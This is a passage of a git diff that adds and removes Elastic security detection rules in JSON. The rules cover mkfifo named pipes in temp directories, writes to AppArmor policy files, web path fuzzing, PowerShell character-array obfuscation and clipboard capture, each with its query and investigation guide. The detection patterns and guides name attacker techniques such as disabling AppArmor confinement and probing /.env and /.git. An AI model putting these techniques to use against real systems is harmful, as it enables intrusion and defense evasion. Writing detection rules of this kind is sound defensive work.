unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity or lateral movement.\n- Terminate any suspicious processes associated with the mkfifo command, especially those originating from common shell processes like bash or sh.\n- Delete any named pipes created in directories such as /tmp, /dev/shm, or /var/tmp that do not follow expected naming conventions or are not part of legitimate applications.\n- Conduct a thorough review of user accounts and permissions on the affected system to identify any unauthorized access or privilege escalation.\n- Restore the system from a known good backup if any unauthorized changes or persistence mechanisms are detected.\n- Implement additional monitoring on the affected system and network to detect any further attempts to create suspicious named pipes or execute unauthorized commands.\n- Escalate the incident to the security operations team for further investigation and to determine if the threat is part of a larger attack campaign.\n", - "query": "host.os.type:linux and event.category:process and event.type:start and event.action:exec and process.name:mkfifo and\nprocess.parent.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and\nprocess.args:((/dev/shm/* or /tmp/* or /var/tmp/*) and not /*fifo*)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "8167c5ae-3310-439a-8a58-be60f55023d2", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0011", - "name": "Command and Control", - "reference": "https://attack.mitre.org/tactics/TA0011/" - }, - "technique": [ - { - "id": "T1071", - "name": "Application Layer Protocol", - "reference": "https://attack.mitre.org/techniques/T1071/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 2 - }, - "id": "8167c5ae-3310-439a-8a58-be60f55023d2_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8293bf1f-8dd0-434e-b52a-1aa6ec101777_1.json b/packages/security_detection_engine/kibana/security_rule/8293bf1f-8dd0-434e-b52a-1aa6ec101777_1.json new file mode 100644 index 00000000000..9f9d5c31e7e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8293bf1f-8dd0-434e-b52a-1aa6ec101777_1.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects processes attempting to write to AppArmor policy management pseudo-files located under \"/sys/kernel/security/apparmor/\". These special kernel interfaces are used to load, replace, or remove AppArmor profiles (\".load\", \".replace\", \".remove\"). In normal environments, AppArmor policy management is typically performed by administrative tools such as \"apparmor_parser\" during system initialization or package installation. Direct interaction with these pseudo-files from shell utilities, interpreters, or scripting environments is uncommon and may indicate attempts to modify security policy at runtime. Adversaries may abuse these interfaces to weaken or disable AppArmor protections, introduce malicious profiles, or exploit vulnerabilities in the AppArmor policy parser as part of local privilege escalation chains.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Write Attempt to AppArmor Policy Management Files", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Write Attempt to AppArmor Policy Management Files\n\nThis rule flags shells, scripting runtimes, and basic file utilities trying to write directly to AppArmor\u2019s policy control files, an unusual action that can change or remove enforcement while the system is running. An attacker with local code execution may echo a crafted profile into `.replace` or write to `.remove` from a shell script to weaken confinement before dumping credentials or launching a privilege-escalation chain.\n\n### Possible investigation steps\n\n- Determine whether the activity aligns with authorized package installation, configuration management, or AppArmor maintenance by correlating the timestamp with change tickets, software updates, and administrator sessions.\n- Reconstruct the full parent-child execution chain and user context to identify how the write was initiated, whether it came from an interactive shell, script, container entrypoint, or remotely spawned session, and whether elevated privileges were obtained just beforehand.\n- Capture the exact payload or referenced file used in the write attempt and compare it to approved AppArmor profiles to determine whether the action was loading a new profile, weakening an existing one, or removing confinement entirely.\n- Verify the system\u2019s current AppArmor state immediately after the event, including enforcement mode, recently modified or unloaded profiles, and any audit or kernel messages indicating parser errors, profile replacement, or successful policy removal.\n- Investigate adjacent activity from the same user, session, and host for signs of defense evasion or privilege escalation, such as sudo abuse, exploitation traces, disabling other security controls, credential access, or rapid execution of binaries that would normally be confined.\n\n### False positive analysis\n\n- A legitimate system initialization or package maintenance script may use `echo`, `tee`, `cat`, or a shell redirection to load or replace an approved AppArmor profile, so verify the parent process and event timing align with boot activity or an authorized update and that the profile content matches a known file under `/etc/apparmor.d/`.\n- An administrator or deployment script may temporarily reload or remove a profile during sanctioned application troubleshooting, so confirm the executing user or service account, the script location and change record, and that the expected AppArmor profile was restored or reloaded immediately afterward.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network and suspend interactive access while preserving the shell history, the script or payload used to write to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and any related dropped files for forensic review.\n- Re-enable AppArmor enforcement from trusted administration tooling, compare currently loaded profiles with the approved baseline under `/etc/apparmor.d/`, and remove any unauthorized profile loads, replacements, or profile removals introduced by the attacker.\n- Hunt for and delete persistence established around the same activity, including new or modified `systemd` services, cron jobs, startup scripts, SSH `authorized_keys` entries, `sudoers` changes, and binaries or scripts placed in writable directories.\n- Escalate immediately to incident response if AppArmor protections were successfully weakened or removed, a privileged service profile was altered, root access is suspected, or similar write attempts appear on additional Linux systems.\n- Restore the host to a known-good state from a trusted image or approved configuration backup when system integrity is uncertain, then rotate credentials used on the host and harden access so only authorized administrators and deployment tooling can modify AppArmor policies.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\") and\n( \n process.name in (\n \"cat\", \"echo\", \"tee\", \"dd\", \"truncate\", \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\",\n \"busybox\", \"awk\", \"sed\", \"xargs\", \"find\", \"grep\", \"node\", \"timeout\", \"env\"\n ) or\n process.name like (\".*\", \"python*\", \"perl*\", \"ruby*\", \"lua*\", \"php*\")\n) and\nprocess.command_line like (\n \"*/sys/kernel/security/apparmor/.load*\",\n \"*/sys/kernel/security/apparmor/.replace*\",\n \"*/sys/kernel/security/apparmor/.remove*\"\n)\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8293bf1f-8dd0-434e-b52a-1aa6ec101777", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "8293bf1f-8dd0-434e-b52a-1aa6ec101777_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_3.json b/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_3.json new file mode 100644 index 00000000000..2344abdff5b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_3.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Discovery or Fuzzing Activity", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Discovery or Fuzzing Activity\n\nThis rule flags a single origin generating a rapid burst of GET requests that produce many 404/403 responses, a hallmark of automated web discovery or fuzzing. Attackers commonly run wordlist-driven enumeration to probe paths such as /admin/, /login, /backup.zip, /.env, /.git/, and undocumented API routes, gauging which resources exist and where access controls fail. Detecting this reconnaissance early helps prevent subsequent targeted exploitation of newly found endpoints and weak authentication flows.\n\n### Possible investigation steps\n\n- Correlate user-agent, TLS JA3/JA4, Host/SNI, and X-Forwarded-For to fingerprint the client, identify common fuzzing tools or disguised automation, and recover the true origin if traffic traversed a CDN or proxy.\n- Summarize the top requested paths and response codes for this source to spot any 2xx or 401 outcomes amid the denials, flagging hits on sensitive locations such as /.env, /.git, /admin interfaces, backups, installer scripts, and undocumented API routes.\n- Pivot to the same timeframe for adjacent web and authentication activity from this origin to see whether POSTs, credential attempts, or parameterized requests followed the enumeration, indicating progression toward exploitation or spraying.\n- Review WAF/CDN and reverse-proxy logs for blocks, challenges, or rate limiting and whether multiple virtual hosts were targeted via the Host header, confirming if and how far requests reached the application tier.\n- Validate whether the source aligns with approved internal scanners or scheduled testing via inventories and change records, and if not, enrich with ASN/geolocation, reverse DNS, and threat intel to assess reputation and recurrence across your estate.\n\n### False positive analysis\n\n- An internal QA link checker or monitoring crawler run from a single host can request hundreds of unique paths and generate many 404/403 GETs when routes, assets, or permissions are misconfigured.\n- A shared egress IP (NAT or corporate proxy) aggregating many users during a faulty deployment can trigger high volumes of 404/403 GETs as browsers collectively hit moved or newly restricted resources.\n\n### Response and remediation\n\n- Immediately rate-limit or block the offending source IP at the WAF/CDN and reverse proxy, applying a challenge or temporary ban to the observed User-Agent and JA3/JA4 fingerprint driving the 500+ unique-path 404/403 GET burst.\n- If traffic came through a proxy or CDN, use X-Forwarded-For to identify and block the true origin, and add a temporary ASN or geolocation block if the source aligns with known scanner networks.\n- Verify whether the source is an approved internal scanner; if not, disable the job or container, remove any scheduled tasks and API keys used, and notify the owner to stop testing against production immediately.\n- Review the requested path list to identify any 2xx or 401 hits and remediate exposures such as accessible /.env, /.git, /admin interfaces, backup archives, or installer scripts by removing files, disabling endpoints, and rotating secrets.\n- Escalate to incident response if enumeration persists after blocking, pivots to POSTs or credential attempts, originates from rotating IPs (Tor/VPN/residential), or produces 2xx on sensitive endpoints despite WAF rules.\n- Harden the web tier by enabling per-IP rate limiting and bot challenges, turning off directory listing and default app endpoints, blocking patterns like /.git/, /.env, and /backup.zip at the WAF, and restricting origin access to CDN egress only.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n| where\n http.request.method == \"GET\" and \n http.response.status_code in (404, 403)\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| keep\n @timestamp,\n event.dataset,\n http.request.method,\n http.response.status_code,\n source.ip,\n agent.id,\n agent.name,\n Esql.url_original_to_lower,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower),\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.http_request_method_values = values(http.request.method),\n Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.url_original_values = values(Esql.url_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip\n| where\n Esql.event_count > 500 and Esql.url_original_count_distinct > 250\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_request_method_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "8383a8d0-008b-47a5-94e5-496629dc3590", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "8383a8d0-008b-47a5-94e5-496629dc3590_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_6.json b/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_6.json deleted file mode 100644 index b8b8f782797..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_6.json +++ /dev/null @@ -1,173 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use character arrays and runtime string reconstruction as a form of obfuscation. This technique breaks strings into individual characters, often using constructs like char[] with index-based access or joining logic. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Character Array Reconstruction", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Character Array Reconstruction\n\nPowerShell, a powerful scripting language, is often targeted by adversaries for obfuscation to bypass security measures. By reconstructing strings from character arrays, attackers evade static analysis and detection. The detection rule identifies scripts using such obfuscation by searching for patterns indicative of character array manipulation, thus flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script, focusing on the obfuscated parts indicated by the presence of the \"char\" keyword and the \ud83d\udd25 character.\n- Examine the file.path and host.name fields to determine the origin and location of the script execution, which can provide context about the environment and potential risk.\n- Check the user.id and agent.id fields to identify the user and agent responsible for executing the script, which can help assess whether the activity is expected or suspicious.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other related script blocks, providing a broader view of the script's behavior.\n- Investigate the count field to assess the extent of obfuscation, as a higher count may indicate more complex or extensive obfuscation techniques being used.\n\n### False positive analysis\n\n- Scripts used for legitimate administrative tasks may use character arrays for performance optimization or to handle special characters. Review the script's purpose and context to determine if it aligns with known administrative functions.\n- PowerShell scripts from trusted sources or vendors might use character arrays for legitimate obfuscation to protect intellectual property. Verify the script's origin and check for digital signatures or hashes to confirm authenticity.\n- Automated scripts generated by development tools or frameworks could include character array manipulation as part of their standard output. Identify and whitelist these tools if they are commonly used in your environment.\n- Security tools or monitoring solutions might use character arrays in their scripts for legitimate purposes. Cross-reference with known security software and consider excluding these from the detection rule if they are verified as safe.\n- Regularly update the exclusion list to include new trusted scripts or tools as they are introduced into the environment, ensuring that legitimate activities are not flagged as false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts or unauthorized access.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing obfuscation activities.\n- Conduct a thorough review of the script block text and associated logs to identify any malicious payloads or commands executed.\n- Remove any identified malicious scripts or files from the affected system to prevent re-execution.\n- Reset credentials for any user accounts involved in the alert to mitigate potential credential compromise.\n- Update endpoint protection and ensure that AMSI and other security features are fully enabled and configured to detect similar threats.\n- Escalate the incident to the security operations center (SOC) for further analysis and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter for scripts that contain the \"char\" keyword using MATCH, boosts the query performance\n| where powershell.file.script_block_text : \"char\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(char\\[\\]\\]\\(\\d+,\\d+[^)]+|(\\s?\\(\\[char\\]\\d+\\s?\\)\\+){2,})\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "85e2d45e-a3df-4acf-83d3-21805f564ff4", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "85e2d45e-a3df-4acf-83d3-21805f564ff4_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_7.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_7.json deleted file mode 100644 index 752ff8cb014..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_7.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group leader. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "from": "now-9m", - "history_window_start": "now-7d", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Linux Clipboard Activity Detected", - "new_terms_fields": [ - "host.id", - "process.group_leader.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Linux Clipboard Activity Detected\n\nClipboard utilities on Linux, such as xclip and xsel, facilitate data transfer between applications by storing copied content temporarily. Adversaries exploit this by capturing sensitive data copied by users. The detection rule identifies unusual clipboard activity by monitoring processes that start these utilities, excluding common parent processes, to flag potential misuse. This helps in identifying unauthorized data collection attempts.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific process name that triggered the alert, focusing on clipboard utilities like xclip, xsel, wl-clipboard, clipman, or copyq.\n- Examine the parent process of the detected clipboard utility to understand the context of its execution, ensuring it is not a common parent process like bwrap or micro.\n- Investigate the user account associated with the process to determine if the activity aligns with their typical behavior or if it appears suspicious.\n- Check the timing and frequency of the clipboard utility's execution to assess if it coincides with any known user activities or if it suggests automated or unauthorized access.\n- Analyze any related process events or logs around the time of the alert to identify potential data exfiltration attempts or other malicious activities.\n- Consider correlating this alert with other security events or alerts to identify patterns or broader attack campaigns targeting clipboard data.\n\n### False positive analysis\n\n- Frequent use of clipboard utilities by legitimate applications or scripts can trigger false positives. Identify and document these applications to create exceptions in the detection rule.\n- Developers and system administrators often use clipboard utilities in automated scripts. Review and whitelist these scripts to prevent unnecessary alerts.\n- Some desktop environments or window managers may use clipboard utilities as part of their normal operation. Monitor and exclude these processes if they are verified as non-threatening.\n- Regular user activities involving clipboard utilities for productivity tasks can be mistaken for suspicious behavior. Educate users on safe practices and adjust the rule to exclude known benign parent processes.\n- Consider the context of the clipboard utility usage, such as time of day or user role, to refine detection criteria and reduce false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent potential data exfiltration or further unauthorized access.\n- Terminate any suspicious processes identified as running clipboard utilities without a common parent process, such as xclip or xsel, to stop potential data capture.\n- Conduct a thorough review of recent clipboard activity logs to identify any sensitive data that may have been captured and assess the potential impact.\n- Change passwords and rotate any credentials that may have been copied to the clipboard recently to mitigate the risk of credential theft.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected.\n- Implement additional monitoring on the affected system to detect any further unauthorized clipboard activity or related suspicious behavior.\n- Review and update endpoint security configurations to ensure that only authorized processes can access clipboard utilities, reducing the risk of future exploitation.", - "query": "event.category:process and host.os.type:\"linux\" and event.type:\"start\" and\nevent.action:(\"exec\" or \"exec_event\" or \"executed\" or \"process_started\") and\nprocess.name:(\"xclip\" or \"xsel\" or \"wl-clipboard\" or \"clipman\" 